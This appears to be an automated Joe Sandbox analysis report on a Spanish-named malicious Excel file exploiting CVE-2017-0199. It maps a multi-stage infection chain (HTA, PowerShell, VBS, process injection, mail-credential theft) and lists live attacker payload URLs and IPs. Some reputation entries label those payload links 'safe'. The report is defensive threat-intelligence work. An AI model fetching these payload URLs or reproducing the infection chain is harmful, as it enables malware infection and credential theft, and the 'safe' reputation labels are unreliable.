                    Source: Yara matchFile source: 12.2.powershell.exe.12778558.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3440, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting
                    Valid Accounts231
                    Windows Management Instrumentation
                    121
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    3
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    DLL Side-Loading
                    311
                    Process Injection
                    11
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    35
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts23
                    Exploitation for Client Execution
                    Logon Script (Windows)Logon Script (Windows)11
                    Obfuscated Files or Information
                    Security Account Manager531
                    Security Software Discovery
                    SMB/Windows Admin Shares11
                    Email Collection
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts211
                    Command and Scripting Interpreter
                    Login HookLogin Hook1
                    Install Root Certificate
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon ScriptNetwork Logon Script1
                    Software Packing
                    LSA Secrets261
                    Virtualization/Sandbox Evasion
                    SSH1
                    Clipboard Data
                    Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467088 Sample: Cuentas bancarias y cdigo #... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 70 Snort IDS alert for network traffic 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 23 other signatures 2->76 11 EXCEL.EXE 29 33 2->11         started        process3 dnsIp4 60 198.46.178.144, 49166, 49168, 49169 AS-COLOCROSSINGUS United States 11->60 62 hop.fyi 192.185.89.92, 49165, 49167, 80 UNIFIEDLAYER-AS-1US United States 11->62 48 ~$Cuentas bancaria...incorrecto.xla.xlsx, data 11->48 dropped 50 C:\Users\user\AppData\...vengIEcache[1].hta, HTML 11->50 dropped 108 Microsoft Office drops suspicious files 11->108 16 mshta.exe 10 11->16         started        file5 signatures6 process7 dnsIp8 54 hop.fyi 16->54 66 Suspicious command line found 16->66 68 PowerShell case anomaly found 16->68 20 cmd.exe 16->20         started        signatures9 process10 signatures11 84 Suspicious powershell command line found 20->84 86 Wscript starts Powershell (via cmd or directly) 20->86 88 PowerShell case anomaly found 20->88 23 powershell.exe 24 20->23         started        process12 file13 44 C:\Users\user\...\eveningfiledatinglover.vBS, Unicode 23->44 dropped 46 C:\Users\user\AppData\...\cboglgly.cmdline, Unicode 23->46 dropped 90 Installs new ROOT certificates 23->90 27 wscript.exe 1 23->27         started        31 csc.exe 2 23->31         started        signatures14 process15 dnsIp16 64 94.156.65.247, 49170, 80 TERASYST-ASBG Bulgaria 27->64 100 System process connects to network (likely due to code injection or exploit) 27->100 102 Suspicious powershell command line found 27->102 104 Wscript starts Powershell (via cmd or directly) 27->104 106 3 other signatures 27->106 34 powershell.exe 12 4 27->34         started        52 C:\Users\user\AppData\Local\...\cboglgly.dll, PE32 31->52 dropped 38 cvtres.exe 31->38         started        file17 signatures18 process19 dnsIp20 56 91.92.254.194, 49171, 80 THEZONEBG Bulgaria 34->56 78 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 34->78 80 Writes to foreign memory regions 34->80 82 Injects a PE file into a foreign processes 34->82 40 AddInProcess32.exe 12 2 34->40         started        signatures21 process22 dnsIp23 58 ip-api.com 208.95.112.1, 49173, 80 TUT-ASUS United States 40->58 92 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 40->92 94 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 40->94 96 Tries to steal Mail credentials (via file / registry access) 40->96 98 2 other signatures 40->98 signatures24

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx18%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
                    Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://secure.comodo.com/CPS00%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://91.92.254.194/imge/new-image_v.jpgxRm;0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.hta...e0%Avira URL Cloudsafe
                    http://91.92.254.194/imge/new-image_v.jpg0%Avira URL Cloudsafe
                    http://hop.fyi/ppltLP80%Avira URL Cloudsafe
                    http://hop.fyi/ppltLT80%Avira URL Cloudsafe
                    http://hop.fyi/ppltLl0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.htax0%Avira URL Cloudsafe
                    http://hop.fyi/ppltLh0%Avira URL Cloudsafe
                    http://198.46.178.1440%Avira URL Cloudsafe
                    http://198.46.178.144/madamwebbbbbbbas6444.txt0%Avira URL Cloudsafe
                    http://hop.fyi/ppltL0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.hta6o0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                    http://198.46.178.144/eveningfiledatinglover.vbst0%Avira URL Cloudsafe
                    http://198.46.178.144/f0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.hta...0%Avira URL Cloudsafe
                    http://198.46.178.144/j0%Avira URL Cloudsafe
                    http://198.46.178.144/eveningfiledatinglover.vbsp0%Avira URL Cloudsafe
                    http://go.micros0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.htaZ0%Avira URL Cloudsafe
                    http://91.92.254.1940%Avira URL Cloudsafe
                    http://hop.fyi/0%Avira URL Cloudsafe
                    http://198.46.178.144/eveningfiledatinglover.vbs0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.htahttp://198.46.178.144/EvengIEcache.hta00%Avira URL Cloudsafe
                    http://hop.fyi/ppltLB0%Avira URL Cloudsafe
                    http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.hta/0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.htaC:0%Avira URL Cloudsafe
                    http://198.46.178.144/eveningfiledatinglover.vbstt0%Avira URL Cloudsafe
                    http://198.46.178.144/eveningfil0%Avira URL Cloudsafe
                    http://198.46.178.144/EvengIEcache.hta0%Avira URL Cloudsafe
                    http://go.cr0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    hop.fyi
                    192.185.89.92
                    truefalse
                      unknown
                      ip-api.com
                      208.95.112.1
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://91.92.254.194/imge/new-image_v.jpgtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/madamwebbbbbbbas6444.txttrue
                        • Avira URL Cloud: safe
                        unknown
                        http://hop.fyi/ppltLfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/eveningfiledatinglover.vbstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.htatrue
                        • Avira URL Cloud: safe
                        unknown
                        http://ip-api.com/line/?fields=hostingfalse
                        • URL Reputation: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.hta...emshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://hop.fyi/ppltLlmshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://account.dyn.com/powershell.exe, 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/server1.crl0powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://ocsp.entrust.net03powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://hop.fyi/ppltLT8mshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://hop.fyi/ppltLhmshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://91.92.254.194/imge/new-image_v.jpgxRm;powershell.exe, 0000000C.00000002.504336170.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.htaxmshta.exe, 00000004.00000003.465933300.0000000002BFD000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://hop.fyi/ppltLP8mshta.exe, 00000004.00000002.466473179.000000000034E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/Iconpowershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://198.46.178.144powershell.exe, 0000000C.00000002.504336170.0000000002713000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.hta6omshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/fmshta.exe, 00000004.00000003.463853080.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.000000000040E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://go.microspowershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/jmshta.exe, 00000004.00000003.463853080.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.000000000040E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/eveningfiledatinglover.vbstpowershell.exe, 00000007.00000002.490786833.000000001C28A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.hta...mshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.466473179.00000000003BF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/eveningfiledatinglover.vbsppowershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://91.92.254.194powershell.exe, 0000000C.00000002.504336170.0000000002570000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.htaZmshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://hop.fyi/mshta.exe, 00000004.00000002.466473179.00000000003F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.00000000003FC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/powershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.489807943.0000000012341000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://ip-api.comAddInProcess32.exe, 0000000E.00000002.619170569.0000000002431000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024EE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://hop.fyi/ppltLBCuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx, 46930000.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.hta/mshta.exe, 00000004.00000003.464522889.00000000003BF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txtwscript.exe, 0000000B.00000003.516835984.0000000000413000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.517801046.0000000000485000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.516954761.0000000000411000.00000004.00000020.00020000.00000000.sdmp, eveningfiledatinglover[1].vbs.7.dr, eveningfiledatinglover.vBS.7.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.htaC:mshta.exe, 00000004.00000002.466473179.00000000003F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.464522889.00000000003FC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/eveningfiledatinglover.vbsttpowershell.exe, 00000007.00000002.490786833.000000001C28A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.485211497.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.504336170.0000000002371000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.0000000002431000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://secure.comodo.com/CPS0powershell.exe, 00000007.00000002.490786833.000000001C280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://198.46.178.144/EvengIEcache.htahttp://198.46.178.144/EvengIEcache.hta0mshta.exe, 00000004.00000003.465933300.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.178.144/eveningfilpowershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.490786833.000000001C2DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://go.crpowershell.exe, 00000007.00000002.490786833.000000001C30D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        192.185.89.92
                        hop.fyiUnited States
                        46606UNIFIEDLAYER-AS-1USfalse
                        208.95.112.1
                        ip-api.comUnited States
                        53334TUT-ASUStrue
                        198.46.178.144
                        unknownUnited States
                        36352AS-COLOCROSSINGUStrue
                        94.156.65.247
                        unknownBulgaria
                        31420TERASYST-ASBGtrue
                        91.92.254.194
                        unknownBulgaria
                        34368THEZONEBGtrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1467088
                        Start date and time:2024-07-03 18:01:44 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:17
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winXLSX@16/24@4/5
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 93%
                        • Number of executed functions: 31
                        • Number of non-executed functions: 4
                        Cookbook Comments:
                        • Found application associated with file extension: .xlsx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                        • Execution Graph export aborted for target mshta.exe, PID 1100 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
                        TimeTypeDescription
                        12:03:26API Interceptor37x Sleep call for process: mshta.exe modified
                        12:03:28API Interceptor88x Sleep call for process: powershell.exe modified
                        12:03:37API Interceptor123x Sleep call for process: wscript.exe modified
                        12:03:45API Interceptor28x Sleep call for process: AddInProcess32.exe modified
                        InputOutput
                        URL: Office document Model: gpt-4o
                        ```json{  "riskscore": 0,  "reasons": "The provided screenshot does not contain any visible text or links. It appears to be a blank or obscured document, making it impossible to analyze for phishing risks. There are no visually prominent buttons or links, no text creating a sense of urgency or interest, and no impersonation of well-known brands."}
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        192.185.89.92Ship particulars.xlsGet hashmaliciousUnknownBrowse
                        • hop.fyi/sWel7
                        DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
                        • hop.fyi/aNUxj
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • hop.fyi/mxcbs
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • hop.fyi/mxcbs
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • hop.fyi/uW4Kj
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • hop.fyi/mxcbs
                        Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
                        • hop.fyi/30dp7
                        208.95.112.16bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                        • ip-api.com/line/?fields=hosting
                        H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • ip-api.com/line/?fields=hosting
                        kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                        • ip-api.com/line/?fields=hosting
                        bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                        • ip-api.com/line/?fields=hosting
                        jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                        • ip-api.com/line/?fields=hosting
                        tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • ip-api.com/line/?fields=hosting
                        fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                        • ip-api.com/line/?fields=hosting
                        9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • ip-api.com/line/?fields=hosting
                        BomqT2a55e.exeGet hashmaliciousAgentTeslaBrowse
                        • ip-api.com/line/?fields=hosting
                        E48ALuMJ3m.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • ip-api.com/line/?fields=hosting
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        hop.fyiShip particulars.xlsGet hashmaliciousUnknownBrowse
                        • 192.185.89.92
                        DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
                        • 192.185.89.92
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • 192.185.89.92
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • 192.185.89.92
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • 192.185.89.92
                        457525.xlsGet hashmaliciousUnknownBrowse
                        • 192.185.89.92
                        Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
                        • 192.185.89.92
                        ip-api.com6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        BomqT2a55e.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        E48ALuMJ3m.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        THEZONEBGShip particulars.xlsGet hashmaliciousUnknownBrowse
                        • 91.92.254.29
                        KVAoyRsrZC.exeGet hashmaliciousUnknownBrowse
                        • 91.92.248.9
                        MzXmoBVXtU.exeGet hashmaliciousXenoRATBrowse
                        • 91.92.248.167
                        AVKlyo045S.exeGet hashmaliciousXenoRATBrowse
                        • 91.92.248.167
                        Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                        • 91.92.254.29
                        Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                        • 91.92.254.29
                        RW-TS-Payment204_A3084_04893_D4084_Y5902_CE3018_S4081_W30981.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                        • 91.92.255.36
                        4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
                        • 91.92.254.29
                        02_07_2024_D#U00f6nemi_MEVDUAT Ekstre Bilgiler.exeGet hashmaliciousAsyncRATBrowse
                        • 91.92.240.178
                        JrBo2dgrUX.exeGet hashmaliciousLokibotBrowse
                        • 91.92.240.69
                        AS-COLOCROSSINGUSShip particulars.xlsGet hashmaliciousUnknownBrowse
                        • 198.46.178.139
                        wcNDx6MT9O.exeGet hashmaliciousRemcosBrowse
                        • 107.173.4.16
                        cnaniAxghZ.exeGet hashmaliciousRemcosBrowse
                        • 107.175.229.139
                        execute_and_cleanup.shGet hashmaliciousUnknownBrowse
                        • 108.174.58.28
                        4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
                        • 23.95.235.16
                        Payment_Advice.xlsGet hashmaliciousUnknownBrowse
                        • 192.3.179.150
                        DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
                        • 23.95.235.16
                        Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
                        • 198.46.178.137
                        orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                        • 192.3.243.156
                        ORDER-7019-2024.jsGet hashmaliciousAgentTeslaBrowse
                        • 192.210.215.11
                        UNIFIEDLAYER-AS-1USArt_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                        • 192.185.208.8
                        Ship particulars.xlsGet hashmaliciousUnknownBrowse
                        • 192.185.89.92
                        spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                        • 192.185.208.8
